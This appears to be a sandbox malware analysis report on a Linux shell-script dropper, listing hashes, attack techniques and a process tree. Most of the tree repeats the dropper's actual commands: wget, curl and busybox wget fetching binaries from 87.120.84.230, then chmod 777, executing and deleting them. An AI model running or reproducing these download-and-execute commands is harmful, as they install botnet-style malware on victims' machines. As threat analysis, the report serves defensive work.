Analysis
-
max time kernel
61s -
max time network
59s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
-
Size
10KB
-
MD5
3aaf11d0f07a6e2ac3ecd444e17b7264
-
SHA1
20aa3c7e07680e3c4c69d8f73bb7b0c6907720dd
-
SHA256
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea
-
SHA512
d017e3552474bf26ac8e1ee45c9b4122fa7943f4d4e234071da4a28d2a874653c9d1461ffc5152af8c0d3e923f8074ed0f8b165d934f68c4eb7df0dd2e45a65e
-
SSDEEP
192:VLV2KcsxV/G+N6GA5uKgqcl2KcixVTG+N6GQM:NV2Kcz5uKgqM2Kc3M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 791 chmod 816 chmod 987 chmod 764 chmod 939 chmod 945 chmod 951 chmod 981 chmod 927 chmod 891 chmod 864 chmod 903 chmod 933 chmod 975 chmod 915 chmod 909 chmod 858 chmod 885 chmod 897 chmod 957 chmod 963 chmod 810 chmod 870 chmod 876 chmod 969 chmod 840 chmod 921 chmod 747 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 748 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 765 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 792 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 811 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 817 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 841 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 859 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 865 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 871 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 877 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 886 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 892 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 898 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 904 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 910 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 916 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 922 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 928 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 934 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 940 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 946 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 952 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 958 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 964 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 970 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 976 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 982 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 988 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl
Processes
-
/tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh/tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh1⤵PID:716
-
/bin/rm/bin/rm bins.sh2⤵PID:718
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:746
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:758
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:768
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:786
-
-
/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:809
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:815
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:835
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:857
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:863
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:869
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:875
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:879
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:884
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:890
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:896
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:902
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:908
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:914
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:920
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:926
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:932
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:938
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:944
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
